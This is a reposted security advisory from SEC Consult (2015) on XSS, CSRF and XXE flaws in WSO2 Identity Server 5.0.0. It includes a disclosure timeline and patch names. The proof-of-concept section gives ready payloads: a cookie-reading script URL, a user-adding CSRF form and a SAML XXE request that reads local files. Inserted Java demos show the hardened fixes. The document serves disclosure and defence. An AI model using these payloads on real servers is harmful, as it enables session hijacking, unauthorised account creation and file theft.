SEC Consult SA-20150513-0 :: Multiple critical vulnerabilities in WSO2 Identity Server

Type securityvulns
Reporter Securityvulns
Modified 2015-05-18T00:00:00



SEC Consult Vulnerability Lab Security Advisory < 20150513-0 >

          title: Multiple critical vulnerabilities
        product: WSO2 Identity Server
                 other WSO2 Carbon based products may be affected too

vulnerable version: 5.0.0 (WSO2 Carbon Framework v4.2.0 patch1095)
     fixed version: 5.0.0 with patches 1194 and 1095 applied
         CVE number:
             impact: critical
           homepage:
              found: 2015-02-19
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab

                 An integrated part of SEC Consult
                 Berlin - Frankfurt/Main - Montreal - Singapore
                 Vienna (HQ) - Vilnius - Zurich



Vendor description:

"WSO2 Identity Server provides sophisticated security and identity management of enterprise web applications, services, and APIs, and makes life easier for developers and architects with its hassle-free, minimal monitoring and maintenance requirements. In its latest version, Identity Server acts as an Enterprise Identity Bus (EIB) — a central backbone to connect and manage multiple identities regardless of the standards on which they are based."


Business recommendation:

The WSO2 Identity Server has three security vulnerabilities that allow an attacker to take over administrative user sessions, add arbitrary users and read arbitrary local files. Moreover, the XXE vulnerability potentially allows an attacker to conduct further attacks on internal servers, since the entity resolver also fetches remote URLs and may therefore be used to bypass firewall rules.

SEC Consult only conducted a very quick and narrow check on the WSO2 Identity Server. Since even this check turned up a critical vulnerability, SEC Consult suspects that the Identity Server contains further critical vulnerabilities.

Since other WSO2 products are based on the same framework (WSO2 Carbon Framework), it is possible that these or similar vulnerabilities affect other products too.

SEC Consult recommends not using any product based on the WSO2 Carbon Framework until a thorough security review has been conducted.

Vulnerability overview/description:

1) Reflected cross-site scripting (XSS, IDENTITY-3280)
The WSO2 Identity Server is vulnerable to reflected cross-site scripting. An attacker can lure a victim who is logged in to the Identity Server administration web interface into e.g. clicking on a link and thereby take over the victim's session.

2) Cross-site request forgery (CSRF, IDENTITY-3280)
On at least one web page, CSRF protection has not been implemented. An attacker on the internet can lure a victim who is logged in to the Identity Server administration web interface onto a web page containing, e.g., a manipulated <img> tag. The attacker is then able to add arbitrary users to the Identity Server.

3) XML external entity injection (XXE, IDENTITY-3192)
An unauthenticated attacker can use the SAML authentication interface to inject arbitrary external XML entities. This allows the attacker to read arbitrary local files. Moreover, since the XML entity resolver also follows remote URLs, the vulnerability may allow an attacker to bypass firewall rules and conduct further attacks on internal hosts.

Proof of concept:

1) Reflected cross-site scripting (XSS, IDENTITY-3280)
When opening the following URL, an alert box is shown as an example:

http://<host>:9443/carbon/user/change-passwd.jsp?isUserChange=true&returnPath=../userstore/index.jsp%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

When a user without permission to create other users issues the following request, an alert box is shown:

---- snip ----
POST /carbon/user/add-finish.jsp HTTP/1.1
Host: <host>:9443
Cookie: <cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 261

pwd_primary_null=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_primary_null=%5E%5B%5CS%5D%7B3%2C30%7D%24&pwd_PRIMARY=%5E%5B%5CS%5D%7B5%2C30%7D%24&usr_PRIMARY=%5E%5B%5CS%5D%7B3%2C30%7D%24&domain=PRIMARY&username=secconsult&passwordMethod=defineHere&password=test123&retype=test123
---- snip ----
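The first PoC works because the returnPath parameter is written straight into an HTML attribute, so a double quote closes the attribute and the rest of the value becomes markup. The following Java program is an added illustration of that pattern and of the two fixes (allow-list validation and attribute encoding); it is not WSO2 code and does not reproduce the real JSP. The fallback page name and the allow-list pattern are assumptions chosen for the demo.

```java
import java.util.regex.Pattern;

/** Added example (not WSO2 code): rendering a user-controlled back-link safely. */
public class ReturnPathDemo {

    // The returnPath value from the advisory's PoC URL, after URL-decoding.
    static final String POC = "../userstore/index.jsp\"><script>alert(document.cookie)</script>";

    /** Vulnerable pattern: the parameter is concatenated straight into an attribute. */
    static String renderUnsafe(String returnPath) {
        return "<a href=\"" + returnPath + "\">Back</a>";
    }

    /** Minimal HTML attribute encoder: every character that can close the attribute
     *  or start markup is replaced by a character reference. */
    static String encodeForHtmlAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Assumed allow-list: relative console paths only ("../" prefixes, plain
    // segments, a .jsp target, optional simple query string). No scheme, no quotes.
    private static final Pattern ALLOWED = Pattern.compile(
        "(?:\\.\\./)*[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*\\.jsp(?:\\?[A-Za-z0-9_=&.-]*)?");

    /** Hardened: validate first, fall back to a fixed page (assumed name), then encode anyway. */
    static String renderSafe(String returnPath) {
        String target = (returnPath != null && ALLOWED.matcher(returnPath).matches())
                ? returnPath
                : "../admin/index.jsp";
        return "<a href=\"" + encodeForHtmlAttribute(target) + "\">Back</a>";
    }

    public static void main(String[] args) {
        // Attribute is closed and a <script> element is injected.
        System.out.println(renderUnsafe(POC));
        // Rejected by the allow-list, so the fixed fallback is rendered.
        System.out.println(renderSafe(POC));
        // The legitimate value from the PoC URL still works.
        System.out.println(renderSafe("../userstore/index.jsp"));
        // Even without validation, encoding alone keeps the quote inside the attribute.
        System.out.println("<a href=\"" + encodeForHtmlAttribute(POC) + "\">Back</a>");
    }
}
```

The two layers are independent: the allow-list stops the value from pointing anywhere but the console, and the encoder guarantees that whatever is rendered cannot leave the attribute context. Either one alone would have blocked this PoC; the second PoC (an error message that echoes the submitted fields) needs the same encoding applied in the element-content context.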

2) Cross-site request forgery (CSRF, IDENTITY-3280)
The following HTML fragment demonstrates this issue:

---- snip ----
<form method="POST" action="https://<host>:9443/carbon/user/add-finish.jsp">
  <input type="text" name="domain" value="PRIMARY"/>
  <input type="text" name="username" value="secconsult"/>
  <input type="text" name="password" value="test123"/>
  <input type="submit"/>
</form>
---- snip ----

3) XML external entity injection (XXE, IDENTITY-3192)
After issuing the following request to a vulnerable Windows server, the contents of the C: drive are returned:

---- snip ----
<?xml version="1.0"?>
<!DOCTYPE AuthnRequest [
<!ELEMENT AuthnRequest ANY >
<!ENTITY xxe SYSTEM "file:///C:/" >]>
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    Destination="https://<host>/samlsso"
    ID="_ffffffff-0000-0000-0000-ffffffffffff"
    IssueInstant="2015-01-01T01:01:01Z"
    ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
    Version="2.0">
  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    XXXX&xxe;YYYY
  </saml:Issuer>
  <samlp:NameIDPolicy AllowCreate="true"
    Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
---- snip ----
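The PoC relies on the server parsing the AuthnRequest with a JAXP parser in its default configuration, which processes the inline DTD and fetches the SYSTEM entity before the application ever looks at the Issuer element. The program below is an added example, not WSO2 code and not the vendor's patch: it feeds the advisory's request to a default DocumentBuilder and to one hardened the way a SAML endpoint should be, and shows where the file contents end up. To run offline it points the entity at a temporary file it creates itself instead of file:///C:/; the Destination host and the feature set are assumptions (the features are the documented Xerces/JAXP ones).

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

/** Added example (not WSO2 code): the advisory's AuthnRequest against a default and a hardened parser. */
public class SamlXxeDemo {

    /** The PoC from the advisory, with the entity pointed at the given file URI. */
    static String authnRequest(String fileUri) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE AuthnRequest [\n"
             + "  <!ELEMENT AuthnRequest ANY >\n"
             + "  <!ENTITY xxe SYSTEM \"" + fileUri + "\" >\n"
             + "]>\n"
             + "<samlp:AuthnRequest xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\"\n"
             + "    Destination=\"https://idp.example.test/samlsso\"\n"   // assumed host
             + "    ID=\"_ffffffff-0000-0000-0000-ffffffffffff\"\n"
             + "    IssueInstant=\"2015-01-01T01:01:01Z\"\n"
             + "    ProtocolBinding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\"\n"
             + "    Version=\"2.0\">\n"
             + "  <saml:Issuer xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\">XXXX&xxe;YYYY</saml:Issuer>\n"
             + "  <samlp:NameIDPolicy AllowCreate=\"true\"\n"
             + "      Format=\"urn:oasis:names:tc:SAML:2.0:nameid-format:transient\"/>\n"
             + "</samlp:AuthnRequest>\n";
    }

    /** Default JAXP configuration: the DTD is processed and external entities are fetched. */
    static DocumentBuilder unhardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        return f.newDocumentBuilder();
    }

    /** Hardened: no DOCTYPE at all (a SAML message never needs one), plus defence in depth. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses the request and returns the Issuer text, which is where the entity content lands. */
    static String issuerText(DocumentBuilder builder, String xml) throws Exception {
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getElementsByTagNameNS("urn:oasis:names:tc:SAML:2.0:assertion", "Issuer")
                  .item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for the victim's local file (the advisory used file:///C:/).
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "SECRET-FROM-DISK".getBytes(StandardCharsets.UTF_8));
        String xml = authnRequest(secret.toUri().toString());

        // Default parser: prints "unhardened: XXXXSECRET-FROM-DISKYYYY".
        System.out.println("unhardened: " + issuerText(unhardenedBuilder(), xml));

        // Hardened parser: rejected at the DOCTYPE, before any entity is resolved.
        try {
            issuerText(hardenedBuilder(), xml);
            System.out.println("hardened: unexpectedly accepted");
        } catch (SAXParseException e) {
            System.out.println("hardened: rejected - " + e.getMessage());
        }
        Files.deleteIfExists(secret);
    }
}
```

The Issuer value is what an identity provider typically looks up (to find the registered service provider) and echoes in its error page when the lookup fails, which is how a file read turns into a file disclosure; with an http:// or https:// SYSTEM URI the same resolver becomes the firewall-bypassing request mentioned in the description. Disallowing the DOCTYPE is the decisive setting; the remaining features only matter if a DOCTYPE has to be tolerated for some other reason.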

Vulnerable / tested versions:

The version 5.0.0 (with WSO2 Carbon Framework v4.2.0 patch1095 applied) was found to be vulnerable. This was the latest version at the time of discovery.

Vendor contact timeline:

2015-03-19: Contacting vendor through
2015-03-19: Security contact confirms retrieval of the e-mail
2015-03-19: Security contact says that he has trouble opening the attached PDF document
2015-03-19: Sending Responsible Disclosure Policy in plain text
2015-03-20: Security contact states he actually was unable to decrypt the advisory
2015-03-22: Sending security advisory again
2015-03-22: Security contact confirms retrieval of the advisory
2015-03-26: Security contact acknowledges existence of the vulnerabilities
2015-04-10: Asking for an update on the current status and which products and versions are affected
2015-04-10: Security contact: XSS vulnerabilities are fixed in the code, fixing CSRF is in progress, Identity Server 5.0.0 is vulnerable
2015-04-13: Asking whether the patches will be released before the latest possible release date; asking for the status of the XXE vulnerability and whether other products based on Carbon are affected
2015-04-13: Advisory can be released on 2015-05-07, release notes will mention the affected products
2015-05-04: Asking for current status
2015-05-04: Security contact: patches will be released in the next couple of days
2015-05-05: Security contact asks to delay the release of the advisory to 2015-05-13
2015-05-05: Confirming the new release date
2015-05-05: Asking to be credited in the release notes of the patch
2015-05-13: Public release of the advisory


Solution:

Apply the following patches to mitigate these issues:
* WSO2-CARBON-PATCH-4.2.0-1194
* WSO2-CARBON-PATCH-4.2.0-1095

See the following pages for more information:

The patches can be downloaded at



Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web:
Blog:
Twitter:

EOF W. Ettlinger / @2015

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iQIcBAEBAgAGBQJVUx2MAAoJEC0t17XG7og/H/4QAIiwOLbldpFKkJwemTc5qxeu
LSIgJjMy9Yz7HZtu1c65QAPJQ6B+VduU+bN3Lt10AHAWYPTtyjFlQzq4MrcUWaY8
XiO4pA4nYykki9F8QUp1cBX9bfzihqHR/1+sqELJ/ueiz8U4wzUPW31UehTdjV26
d+SZ0FdVPi1BlJb3Ex0ejkxkDB4a9kVYswxu0zti8oZcaXZ++TYdCssssAaA+Vu4
aPErIQMfaXSoeZlJS7f8TYRRR9p2fVJBsXr29CgG9GJBz0DMExF8AKZ+Ve0EJd8u
y2mKPwJgtzLN7Crw1YfD6YoSaTbygdDqFs208VDwAEP5Gh7N19ylhpUdJkgKk56l
jzo+DmqVt9j5R2gu1Nc8+3ienuQ9v6xs5WlOWJC5/2Gh9ngOH31jEZTG2oqjLDxW
pqsXnqG6FEW1qbbB+UCebI3bseqLGJJQQVqYeENh9zX1m82PTuRy9QQDcyXlzl4q
hZksURglFjGwwgahTgR8LVO5kAivqbsahp/IojxSwc0DnceC8NJjYE/qprv+NOG0
2sud3X9AhrlJcwfNMWb795Jgv2fDjox1yu8Noga67a2muz9UwbTJXZKSyn32IpEe
aYQtgSXTT0YaidP7HDUcsuTIhGczL8PGilDCuNRDy2UF0eFHqaj1d9Ou9QSturnn
wu/AhxURurrsfOEg1TMs
=iuLH
-----END PGP SIGNATURE-----